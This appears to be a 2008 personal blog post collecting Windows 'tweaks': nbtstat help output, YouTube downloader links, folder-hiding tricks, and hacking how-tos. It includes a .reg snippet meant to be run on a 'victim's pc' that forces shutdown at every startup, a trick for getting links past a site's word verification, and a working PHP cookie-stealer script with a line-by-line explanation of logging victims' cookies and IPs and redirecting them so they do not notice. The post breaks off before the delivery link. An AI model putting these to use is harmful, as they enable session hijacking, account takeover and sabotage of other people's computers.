Thursday, June 19, 2008

ALL THE GOOD TWEAKS

D:\>nbtstat/?

Displays protocol statistics and current TCP/IP connections using NBT
(NetBIOS over TCP/IP).

NBTSTAT [ [-a RemoteName] [-A IP address] [-c] [-n]
[-r] [-R] [-RR] [-s] [-S] [interval] ]

-a (adapter status) Lists the remote machine's name table given its name
-A (Adapter status) Lists the remote machine's name table given its
IP address.
-c (cache) Lists NBT's cache of remote [machine] names and their IP
addresses
-n (names) Lists local NetBIOS names.
-r (resolved) Lists names resolved by broadcast and via WINS
-R (Reload) Purges and reloads the remote cache name table
-S (Sessions) Lists sessions table with the destination IP addresses
-s (sessions) Lists sessions table converting destination IP
addresses to computer NETBIOS names.
-RR (ReleaseRefresh) Sends Name Release packets to WINS and then, starts Refr
esh

RemoteName Remote host machine name.
IP address Dotted decimal representation of the IP address.
interval Redisplays selected statistics, pausing interval seconds
between each display. Press Ctrl+C to stop redisplaying
statistics.

==================================================================================

10 FANTASTIC YouTube Video Download Tools10 FANTASTIC YouTube, Yahoo, Google Video Downloading Tools.All tested. All working.1.)

Download videos from Yahoo, Youtube,

Google:http://zenisa.com/2007/08/02/download-vdeos-youtube-google-vdeos/

2.) YouTube (IN MPEG) Video Downloaderhttp://zenisa.com/2007/08/01/youtube-in-mpeg-video-downloader/

3.) YouTube (IN MPEG) Video Downloader
http://zenisa.com/2007/08/01/youtube-in-mpeg-video-downloader/

4.) Youtube Grabber - Alternate Link
http://zenisa.com/2007/08/01/youtube-grabber-alternate-link/

5.) YouTube : Download Videos to your DVD
http://zenisa.com/2007/08/01/youtube-download-play-pack/

6.) YouTube to DVD

http://zenisa.com/2007/08/01/hacking-tool-youtube-to-dvd/

7.) 1-2-3 steps to YouTube Download & Play Pack

http://zenisa.com/2007/08/01/1-2-3-steps-to-youtube-download-play-pack/

8.) How to download/capture videos at www.youtube.com

http://zenisa.com/2007/08/01/how-to-downloadcapture-videos-at-wwwyoutubecom/

9.) How to download/capture videos at
www.youtube.comhttp://zenisa.com/2007/08/01/how-to-downloadcapture-videos-at-wwwyoutubecom/

10.) Real Player 11 full (+YOUTUBE DOWNLOADER)

http://zenisa.com/2007/07/30/eal-player-11-full-youtube-downloader/


========================================================================


hide ur folders in adifferentway$$$$$$$$$$$$$$$

hide ur folders in adifferent way

Right Click on the desktop.Make a new folder

2)Now rename the folder with a space(U have to hold ALT key and type 0160 OR 255 ).

3)Now u have a folder with out a name.

4)Right click on the folder>properties>customize. Click on change icon.

5)Scroll a bit, u should find some empty spaces, Click on any one of them.
click ok
Thats it, now u can store ur personal data without any 3rd party tools.


-------------------------------------------------------------------------------------------

U can also hide ur folder by dis method:-

open Start>Run>CMD
now type attrib +s +h C:/name of d folder u want to hide
Now even in the folder option Show all Hide folders is slected still u will get dis folder hide...

And to unhide type same command juzz put "-" instead of "+"

===============================================================

Shutdown ur friend's comp when everytime it starts

put this followin text in a .reg file and run it in the victims pc:

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]"VIRUS"="%windir%\\SYSTEM32\\SHUTDOWN.EXE -t 1 -c \"Howz this new Virus ah\" -f"


------------------------------

DONT PUT IT IN UR COMPUTER, I AM NOT RESPONSIBLE, if it happens, to you, start windows in safe mode, and open registry editor by typiing REGEDIT in start->run. navigate to [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]and remove the string value named VIRUS, restart you computer.



You can also put this in a javascript code, just add this code to your webpage:


=====================================================================================

Bypassing Word Verification

# You may get irritated while sending a link in your friends scrapbook.
# You can bypass this word verification while sending links by this trick.
# The simple logic is you make the link 'dead'.
# All you have to do is to just change http to hTTp (two capital T's) and www to wWw.# Now the link will be dead and bypass the word verification............

========================

Cookie Stealing

What is it?

A cookiestealer is a small script, written in a webbased programming language (in this case PHP). It reads a variable from the address-bar, which contains in our case the cookies, which we want to steal. Ofcourse you can add some more information, like the referrer, the IP and the date and time of the log.

Why to use it?

As you might know, most of the time, login-information is stored in cookies.So if you can make the browser think you're the one who logged in, and setthe cookies, you'll be able to login as the person you defaced. How we makethe browser think this, I will learn you later on.

Writing the stealer.

will give you the script and after that I will explain what it does line by line. So here it is:

1 2 $cookie = $_GET['c];
3 $ip = getenv ('REMOTE_ADDR');
4 $date=date("j F, Y, g:i a");;
5 $referer=getenv ('HTTP_REFERER');
6 $fp = fopen('cookies.txt', 'a');
7 fwrite($fp, 'Cookie: '.$cookie.'
IP: ' .$ip. '
Date and Time: ' .$date. '
Referer: '.$referer.'


');
8 fclose($fp);
9 header ("Location: /picture.html");
10 ?>

That's all! Well, time to explain:
1: 2: $cookie = $_GET['C']; Here the variable $cookie gets the content out ofthe adress, from what's behind C=[the cookie]
3: $ip = getenv ('REMOTE_ADDR'); That's the IP of the person which is redirected to our stealer.
4. $date=date("j F, Y, g:i a");; This sets the variable $date the current time and date, IMPORTANT: this is done in dutch way, so year - month - day!
5. $referer=getenv ('HTTP_REFERER'); That must be the referer, don't youthink =p
6. $fp = fopen('cookies.txt', 'a'); This specifies the file which has to be rewritten with the cookie, and 'a' stands for the way of writing, in this case adding the new content to the end of the file.
7. fwrite($fp, 'Cookie: '.$cookie.'\n IP: ' .$ip. '\n Date and Time: ' .$date. '\nReferer: '.$referer.'\n\n\n'); This line writes the content to the file.
8. fclose($fp); Close the file (dûh)
9. header ("Location: /picture.html"); send the visitor to another page, so hewont notice that the cookie is logged... ofcourse picture.html can be everything.
10. ?> The closing tag for a php-script
Now we have to know how to make the link:This must be the most basic version:

No comments: